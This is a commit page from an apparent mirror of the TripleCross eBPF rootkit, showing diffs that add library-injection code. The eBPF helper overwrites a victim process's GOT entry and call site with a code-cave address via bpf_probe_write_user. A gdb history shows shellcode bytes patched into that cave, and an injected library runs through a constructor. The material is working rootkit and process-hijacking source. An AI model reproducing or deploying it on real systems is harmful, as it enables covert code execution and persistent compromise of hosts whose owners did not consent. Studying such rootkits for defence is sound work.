admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-24 10:23:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Updated helpers and added resources to help with lib injection

Browse Source
This commit is contained in:
h3xduck
2022-03-24 15:40:05 -04:00
parent 9dff5e71dc
commit 8f28c3a883
18 changed files with 12112 additions and 10036 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

21678
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

2
src/common/constants.h
View File

@@ -19,7 +19,7 @@
#define STRING_FS_SUDOERS_ENTRY_LEN 37
//EXECUTION HIJACKING
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated\0"
//LIBRARY INJECTION WITH ROP

23
src/ebpf/include/bpf/injection.h
View File

@@ -14,6 +14,7 @@
#define OPCODE_JUMP_BYTE_0 0xe8
#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
#define CODE_CAVE_ADDRESS 0x0000000000402e95
struct sys_timerfd_settime_enter_ctx {
unsigned long long unused; //Pointer to pt_regs
@@ -66,7 +67,7 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
//bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
return -1;
}
//We have localized the call instruction and thus quite probably the saved RIP.
//We proceed to get the offset of the call.
__u32 offset;
@@ -121,6 +122,21 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
}
bpf_probe_read_user(&got_addr, sizeof(__u64), j_addr);
bpf_printk("GOT_ADDR: %lx\n",got_addr);
__u64 buf = CODE_CAVE_ADDRESS;
bpf_printk("Now writing to J_ADDR %lx\n", j_addr);
if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE J\n");
}else{
__u64 got_addr_new;
bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr);
bpf_printk("Success, new GOT is %lx", got_addr_new);
}
bpf_printk("Now writing to CALL_ADDR %lx\n", call_addr);
if(bpf_probe_write_user(call_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE CALL\n");
}
//Now that we have the address placed in the GOT section we can finally go to the function in glibc
//where the syscall resides. We read the opcodes and check that they are the ones expected
__u8 s_opcode[14];
@@ -180,7 +196,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
__u64 address = 0;
bpf_printk("Timer %i to scan at address %lx\n", fd, scanner);
#pragma unroll
for(__u64 ii=0; ii<100; ii++){
for(__u64 ii=0; ii<200; ii++){
//We got a foothold in the stack via the syscall argument, now we scan to lower memory
//positions assuming those are the saced RIP. We will then perform checks in order to see
//if it truly is the saved RIP (checking that there is a path to the actual syscall).
@@ -210,7 +226,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
}
}
bpf_printk("Finished without findings\n");
return 0;
@@ -272,6 +288,7 @@ int uprobe_execute_command(struct pt_regs *ctx){
}
//bpf_printk("Stack: %x\n", dest_buf);
return 0;
}

386
src/helpers/.gdb_history
View File

@@ -1,172 +1,256 @@
disass main
checksec bof
checksec
quit
disass test_time_values_injection
disass test_time_values_injection+74
b test_time_values_injection+74
b test_time_values_injection + 74
b *(test_time_values_injection + 74)
r
si
si
si
si
q
b timerfd_settime
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
b *(test_time_values_injection+77 )
r
context
q
disass test_time_values_injection
b *(test_time_values_injection +74)
r
si
si
q
b test_time_values_injection +74
b (test_time_values_injection +74)
b *(test_time_values_injection +74)
r
si
display/i $pc
si
si
si
q
disass test_time_values_injection
b *(test_time_values_injection +116)
r
si
si
q
b *(test_time_values_injection +116)
r
si
d/i 0x405130
d/i2 0x405130
display/i2 0x405130
display/i 0x405130
display/i4 0x405130
display/2i 0x405130
display/10i 0x405130
disassemble /r 0x405130
disassemble /r 0x6095d8f7ff7f
disassemble /r 0x6095d8f7ff7f00
disassemble /r 0x6095d8f7ff7f0000
disassemble /r 0x6095d8f7ff7f00007612
disassemble /r 0x6095d8f7ff7f000076
disassemble /r 0x6095d8f7ff7f0000
disassemble /r 0x00007ffff7d89560
d/10i 0x00007ffff7d89560
context
disassemble /r 0x405130
d/10i 0x7ffff7d89560
disassemble 0x7ffff7d89560
disassemble /r 0x7ffff7d89560
disassemble timerfd_settime
disassemble __libc_start_main
q
disass test_time_values_injection
b *(test_time_values_injection+74)
r
si
ni
si
disass timerfd_settime
b 0x00007ffff7d89560
b __timerfd_settime
c
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
x/128i 0x402e95
x/128x 0x402e95
x/128x 0x402e90
x/128i 0x402e90
x/128i 0x402e89
x/10i 0x402e89
x/10i 0x402e90
x/10i 0x402e80
x/128i 0x402e89
x/256i 0x402e89
x/256i 0x402e90
find 0x90909090909090909090909090909090 0x401000 0x403000
context
x/10i 401520
x/10i 0x401520
x/10i 0x401260
x/10i 0x401250
q
r
disass /r 0x405130
x/10i 0x401520
q
b *(test_time_values_injection+77 )
disass /r test_time_values_injection
b *(test_time_values_injection+169)
r
b __timerfd_settime
c
x/10i 0x401250
x/10i 0x401260
x/10i 0x405130
x/10 0x405130
x/10x 0x405130
c
x/10x 0x405130
x/10i 0x405130
c
x/10i 0x405130
si
c
r
q
r
b *0x4013a8
r
r
r
b test_time_values_injection
r
s
q
b test_time_values_injection
r
b 0x4013a8
b *0x4013a8
b *0x4013a4
r
q
b *0x4013a8
r
b test_time_values_injection
r
n
q
b test_time_values_injection
r
n
ni
del 1
del 2
r
b test_time_values_injection
r
q
b __timerfd_settime
b timerfd_S
b timerfd_settime
r
q
b timerfd_settime
r
si
ni
disass timerfd_settime
disass /r timerfd_settime
q
b timerfd_settime
r
si
ni
disass /r timerfd_settime
r
si
ni
q
b timerfd_settime
r
si
ni
stack 200
q
b timerfd_settime
r
si
ni
d/10i 0x7ffff7d89560
d/i 0x7ffff7d89560
disassemble 0x7ffff7d89560
stack 30ç
d/6x 7fffffffdcc8
d/x 7fffffffdcc8
p/x 7fffffffdcc8
p/x 0x7fffffffdcc8
d/x 0x7fffffffdcc8
d/3x 0x7fffffffdcc8
d/3x *0x7fffffffdcc8
x/3x 0x7fffffffdcc8
x/5i 0x7fffffffdcc8
x/5x 0x7fffffffdcc8
x/20x 0x7fffffffdcc8
stack
p __libc_start_main
x/x __libc_start_main
stack
context
context_code
x/x __libc_start_main
q
b timerfd_settime
r
si
ni
x/x __libc_start_main
x/x __libc_dlopen_mode
rop
ropsearch 0f
ropsearch "0f"
ropsearch "0f" libc
ropsearch "pop %rax" libc
ropsearch "pop %rax"
ropsearch "pop %rax"
ropsearch "pop rax"
ropsearch "pop rax" libc
ropsearch "pop eax" libc
ropgadget
ropgadget libc
help ropgadget
help ropsearch
ropsearch "pop eax" libc
q
disass main
l test_time_values_injection
disass test_time_values_injection
b *(test_time_values_injection + 74)
q
r
q
si
b test_time_values_injection
r
b __timerfd_settime
r
c
del 1
x/10i 0x405130
c
r
b test
q
b test_time_values_injection
r
n
ni
si
ni
si
si
q
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
checksecq
q
checksecq
checksec
q
checksec
q
q
q
q
x/10x 0x402e95
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
b __timerfd_settime
c
x/10x 0x405130
c
x/10x 0x405130
q
b test_time_values_injection
r
b __timerfd_settime
c
si
x/10x 0x405130
disass test_time_values_injection
b *(test_time_values_injection+169 )
c
si
x/10x 0x402e95
q
b test_time_values_injection
r
b __timerfd_settime
c
x/10x 0x402e95
x/10x 0x405130
si
x/10x 0x405130
b *(test_time_values_injection+169 )
c
si
set *(int64_t *)0x402e95 0x10
set *(int64_t *)0x402e95 = 0x10
x/10x 0x405130
x/10x 0x402e95
set *(int64_t *)0x402e95 = 0x102131415161718191
set *(int64_t *)0x7ffff7d89560 =
x/10x 0x402e95
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x50
x/10b 0x402e95
x/10i 0x402e95
x/10i 0x7ffff7d89560
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
disass /r 0x402e95
disass 0x402e95
disass /r *0x402e95
x/10i 0x402e95
x/10x 0x405130
x/10i 0x405130
x/10i 0x401260
x/10b 0x401260
x/10i 0x402e95
x/10b 0x401260
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e9d = 0xffe0
x/10b 0x402e95
context
si
x/10i 0x402e95
si
q
b test_time_values_injection
r
b *(test_time_values_injection+169)
r
c
x/10i 0x402e95
x/10b 0x401260
x/10x 0x405130
si
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/10b 0x402e95
set 0x402e9d = 0xffe000000
x/10b 0x402e95
x/12b 0x402e95
x/10i 0x402e95
set 0x402e95 = 0x48B86095D8F7FF7F0000
set 0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/14b 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/20b 0x402e95
x/20i 0x402e95
x/20b 0x402e95
x/10i 0x401230
disass /r test_time_values_injection
x/10i 0x4013a0
x/10b 0x4013a0
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe000000
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe00000
x/20b 0x402e95
x/10i 0x4013a0
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20b 0x402e95
x/20i 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff00000
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff0000
x/20i 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20i 0x402e95
context
si
si
si
si
si
c
q

2
src/helpers/Makefile
View File

@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
clang -g -c execve_hijack.c
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clang -lm -g -fno-plt -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

14
src/helpers/execve_hijack.c
View File

@@ -24,8 +24,8 @@
int test_time_values_injection(){
struct itimerspec new_value;
int max_exp, fd;
struct itimerspec new_value, new_value2;
int max_exp, fd, fd2;
struct timespec now;
uint64_t exp, tot_exp;
ssize_t s;
@@ -40,6 +40,16 @@ int test_time_values_injection(){
if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)
return -1;
fd2 = timerfd_create(CLOCK_REALTIME, 0);
if (fd2 == -1)
return -1;
new_value2.it_interval.tv_sec = 30;
new_value2.it_interval.tv_nsec = 0;
if (timerfd_settime(fd2, TFD_TIMER_ABSTIME, &new_value2, NULL) == -1)
return -1;
printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.

5
src/helpers/injection_lib.c
View File

@@ -1,7 +1,10 @@
#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>
__attribute__((constructor))
static void init()
{
puts("It worked\n");
printf("It worked\n");
syslog(LOG_CRIT, "Library called\n");
}

BIN
src/helpers/injection_lib.o
View File

Binary file not shown.

BIN
src/helpers/injection_lib.so
View File

Binary file not shown.

5
src/helpers/peda-session-execve_hijack.txt
View File

@@ -1,3 +1,4 @@
break timerfd_settime
break timerfd_settime
break test_time_values_injection
break __dlopen
break *(test_time_values_injection+169)

5
src/helpers/peda-session-sudo.txt Normal file
View File

@@ -0,0 +1,5 @@
break test_time_values_injection
disable $bpnum
break *(test_time_values_injection+169)
disable $bpnum